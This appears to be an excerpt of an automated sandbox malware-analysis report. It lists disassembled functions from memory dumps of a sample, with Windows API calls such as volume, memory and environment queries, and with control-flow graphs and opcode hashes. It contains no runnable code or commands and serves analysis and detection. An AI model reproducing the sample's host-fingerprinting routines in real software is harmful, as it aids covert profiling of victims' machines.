                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: InstalledMemoryPhysicallySystem
                                                      • String ID: M:h:$P6D+$hFt=
                                                      • API String ID: 3960555810-4191368970
                                                      • Opcode ID: bc846992b7b2052a54d7e2f813bed90a6e4581f3825d15e18ce225615d1b1e09
                                                      • Instruction ID: 4173e37d6f0c1ab2543cf765436fc4915caf707be8c77472f735ab5a3a2478f6
                                                      • Opcode Fuzzy Hash: bc846992b7b2052a54d7e2f813bed90a6e4581f3825d15e18ce225615d1b1e09
                                                      • Instruction Fuzzy Hash: 7CD16C70504F428BD726CF35C4687E7BBE1AB06308F44496DC2FB8B692C779A50ACB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 488 cedf50-cee009 489 cee00b 488->489 490 cee059-cee099 RtlExpandEnvironmentStrings 488->490 491 cee010-cee057 489->491 492 cee09b-cee0a0 490->492 493 cee0a2 490->493 491->490 491->491 494 cee0a5-cee12e call d03b50 RtlExpandEnvironmentStrings 492->494 493->494 497 cee16d-cee17a call ce7810 494->497 498 cee130-cee16b 494->498 500 cee17f-cee182 497->500 498->497 498->498
                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 00CEE08D
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 00CEE0BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: ru$M3
                                                      • API String ID: 237503144-652937946
                                                      • Opcode ID: 42a09fb4dd023af0f5fd718bd5edad9cea7ae697fb978692b942b35ca82281e3
                                                      • Instruction ID: 20e2b21fcef294eae466a638cc326e6d31321953118722ecfae63c895b228829
                                                      • Opcode Fuzzy Hash: 42a09fb4dd023af0f5fd718bd5edad9cea7ae697fb978692b942b35ca82281e3
                                                      • Instruction Fuzzy Hash: 2F5142B1108381AFE314CF01C890B5BBBE5AB85394F10891DF8A95B391CB75DA468B92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 501 d01dd5-d01e35 call d08070 GetVolumeInformationW
                                                      APIs
                                                      • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00D01E18
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: InformationVolume
                                                      • String ID: :$C$\
                                                      • API String ID: 2039140958-3809124531
                                                      • Opcode ID: 08161da4c0dc70e05f94d5bb499c709da0f846d912e54c744080c352d3e75312
                                                      • Instruction ID: e72d6b5e2f98f5b20d43c1d8fd9d63f31adf5879c6ccb903dd7632066ba0669a
                                                      • Opcode Fuzzy Hash: 08161da4c0dc70e05f94d5bb499c709da0f846d912e54c744080c352d3e75312
                                                      • Instruction Fuzzy Hash: FAF06570694301BBE724CF10EC26F1672A4DF41B04F20C81DB245D62D0DBB5AA199A69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 559 d2d7d7-d2d7e4 560 d2d862-d2d866 559->560 561 d2d7e6-d2d7e7 call d31d97 559->561 562 d2d868-d2d86e 560->562 563 d2d899-d2d89c 560->563 569 d2d7ec-d2d7ef 561->569 567 d2d870-d2d87c 562->567 568 d2d7f1-d2d7f3 562->568 565 d2d8f7-d2d8fa 563->565 566 d2d89e-d2d8b5 call d2eb70 call d31292 563->566 571 d2d903-d2d905 565->571 572 d2d8fc-d2d902 call d2ee8a 565->572 566->568 591 d2d8bb-d2d8d2 call d2eaf5 566->591 573 d2d883-d2d886 567->573 574 d2d87e call d315e2 567->574 576 d2d906-d2d909 568->576 569->568 575 d2d7f8-d2d7ff call d2eef8 569->575 571->576 572->571 573->571 580 d2d888-d2d897 call d31893 call d2eba4 call d31dc7 573->580 574->573 588 d2d801-d2d806 call d31dc7 575->588 589 d2d808-d2d812 call d31d4b call 103ecf2 575->589 580->571 588->568 604 d2d8d4-d2d8e2 call d2ebe1 call eb3509 591->604 605 d2d8eb-d2d8f2 call d2dfe4 591->605 605->568
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: Initialize__mtterm
                                                      • String ID:
                                                      • API String ID: 437650908-0
                                                      • Opcode ID: f2ba8358994a4c2040b2d576de6ef2c58bba5e6f5bcb7457406d58edcfdff686
                                                      • Instruction ID: 5479f81533a14cff93a7c64e3d72a6e0930344ec2232161e5865f552e70b8ad0
                                                      • Opcode Fuzzy Hash: f2ba8358994a4c2040b2d576de6ef2c58bba5e6f5bcb7457406d58edcfdff686
                                                      • Instruction Fuzzy Hash: F111CA3E4042375E9A357BB57C0296E7796EFB236DB780426F456C1042EE25C88295B2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: ^]
                                                      • API String ID: 1029625771-1882935148
                                                      • Opcode ID: d8b7b2445d999ad7b49a6f49a9479f27393342b244a98d53bca3440719b45cf4
                                                      • Instruction ID: 8ba047b8840285ce72ac5edaae23ba3249eb9dc8aa5e6932eaa32d52b903c03b
                                                      • Opcode Fuzzy Hash: d8b7b2445d999ad7b49a6f49a9479f27393342b244a98d53bca3440719b45cf4
                                                      • Instruction Fuzzy Hash: FB3169B0119342ABE708CF10D66065FBBE2EFC4748F188A1CE4895B799DB34C942DF96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,00000000,FFFFFFFF), ref: 00D06D81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: (;O
                                                      • API String ID: 1279760036-2077936600
                                                      • Opcode ID: 53141067adcd155117e7beea7e60cddb7c72fef4438691296e2853e82b590c61
                                                      • Instruction ID: bf09c05f44bb2c6fb1564ae5f4260ab5560c7f07989d27461e20cd0ae1e44391
                                                      • Opcode Fuzzy Hash: 53141067adcd155117e7beea7e60cddb7c72fef4438691296e2853e82b590c61
                                                      • Instruction Fuzzy Hash: AC215E712083419BE708CF14C5A472BB7E2FBC4708F114A1CE49A87391CB74DD41CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00CE784A
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00CE787E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID:
                                                      • API String ID: 237503144-0
                                                      • Opcode ID: 1110698a31a339232b61297f263fa4008ec5f0065596dc0c9d46a1d76a0c4b62
                                                      • Instruction ID: 3289ceb2b3a9dd62e8c1d23f74ad7e9c78dbae9842f3d97418ee7b784e250c64
                                                      • Opcode Fuzzy Hash: 1110698a31a339232b61297f263fa4008ec5f0065596dc0c9d46a1d76a0c4b62
                                                      • Instruction Fuzzy Hash: 930104715083047BE7109B65DC8AFA73BACEB81764F048618F965C72D0EA70A904C7B2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: AllocString
                                                      • String ID:
                                                      • API String ID: 2525500382-0
                                                      • Opcode ID: 8b909345dad16f40f6dcec9e39098652bf9b203a64e8fe5173cc08374af69420
                                                      • Instruction ID: 8234c0a18c1558215a1f46b971905e96b5518b42a5250881d46b2155cc41f53f
                                                      • Opcode Fuzzy Hash: 8b909345dad16f40f6dcec9e39098652bf9b203a64e8fe5173cc08374af69420
                                                      • Instruction Fuzzy Hash: F2418C70108B82DFC324CF28C498756BBE1BB49314F14875CD4EA8BB91DB35E65ACB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: AllocString
                                                      • String ID:
                                                      • API String ID: 2525500382-0
                                                      • Opcode ID: f3b1248720c1e273fc2f535622b9a32e5a69f52abdcb838587614d700df4da5c
                                                      • Instruction ID: 00a1a5956e442be2764171fe58c723a9b7718db09d419ce3a0ba5af17ae85943
                                                      • Opcode Fuzzy Hash: f3b1248720c1e273fc2f535622b9a32e5a69f52abdcb838587614d700df4da5c
                                                      • Instruction Fuzzy Hash: 93412770108B829FD315CF28C498756BBE1BB5A314F04874CD0EA8BB91DB75A659CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • KiUserCallbackDispatcher.NTDLL ref: 00CFD6B9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: CallbackDispatcherUser
                                                      • String ID:
                                                      • API String ID: 2492992576-0
                                                      • Opcode ID: cfb88a6d53ceff3783b89ebb74a17272494c90e128defdb98172fe8fb07d1f35
                                                      • Instruction ID: 0152c93d420c8af44360c4e35fd96d518a94ac687b387b5525ea73423079dfd4
                                                      • Opcode Fuzzy Hash: cfb88a6d53ceff3783b89ebb74a17272494c90e128defdb98172fe8fb07d1f35
                                                      • Instruction Fuzzy Hash: FF3144F0611B009FD761DF3DC946A26BBE8FB0C710B100A2DE99AC7B50E734B8458B92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 87f0385057cb15de0ac3bbab64bb279b834bf0d75188f651dc6ca6ced540d2e9
                                                      • Instruction ID: 332380c19d94e16fd831fd6b9f1c6bf5eefce60a118de74b6448321dd9e6c8d7
                                                      • Opcode Fuzzy Hash: 87f0385057cb15de0ac3bbab64bb279b834bf0d75188f651dc6ca6ced540d2e9
                                                      • Instruction Fuzzy Hash: 384105B0609341AFE708DF11D5A075BBBE2EFC9709F18890CE0895B395C735C9468FA6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 3f43796355bb0ff30fe0930100598af8babdb50b7d1d6d98d526366d2692a349
                                                      • Instruction ID: 6d12228bdfe8453c7e3187d09c8efa6d763293f12d24448bd06b1497112a2c5d
                                                      • Opcode Fuzzy Hash: 3f43796355bb0ff30fe0930100598af8babdb50b7d1d6d98d526366d2692a349
                                                      • Instruction Fuzzy Hash: 12215CB0519341ABD308CF24E9A075F7BE3EBC1704F148A1CE48997755DF35C906ABA6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,00000000,00CD98AB), ref: 00D03BF1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: c0c4d1354a434e4cbf57a88f7bcae437ef35becdfea7d92182394466b0b13f4e
                                                      • Instruction ID: 368bad99cceaa16d382e9153ce31e543ecb1c9de34030f9c2a7fa86a1b995bb2
                                                      • Opcode Fuzzy Hash: c0c4d1354a434e4cbf57a88f7bcae437ef35becdfea7d92182394466b0b13f4e
                                                      • Instruction Fuzzy Hash: 18114871208301AFE704CF15C46475BFBE5EBC4328F108A1DE8A80B691CB75DA0ACBD6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 00D07658
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 7ca58fa43ce9610f00b1eb8d53625a2ff1f43fd7ed454327e72f3bb77fef8923
                                                      • Instruction ID: f8ebb9e582e8496010eefdb1fa62bc32eb180378772396b071650479237fb602
                                                      • Opcode Fuzzy Hash: 7ca58fa43ce9610f00b1eb8d53625a2ff1f43fd7ed454327e72f3bb77fef8923
                                                      • Instruction Fuzzy Hash: AB0105715083519FE710CF04D55474FFBA2EBC4328F54CA4DE8A82B285D375E9498BE2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00D03CB4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: cbd7b67014c113e744af528c3c4f5d57d227dca8df7637c7779131594cd2913d
                                                      • Instruction ID: a0d4779e639c37ac40c96f90447a30c956623031a15f0d48e4c2cf8f702deb1e
                                                      • Opcode Fuzzy Hash: cbd7b67014c113e744af528c3c4f5d57d227dca8df7637c7779131594cd2913d
                                                      • Instruction Fuzzy Hash: D401C8701083409FE314CF14C4A471BBBE1EBC5318F208E4CE8A917691C775D949CF9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$.$0$[$false$null$true${
                                                      • API String ID: 0-1639024219
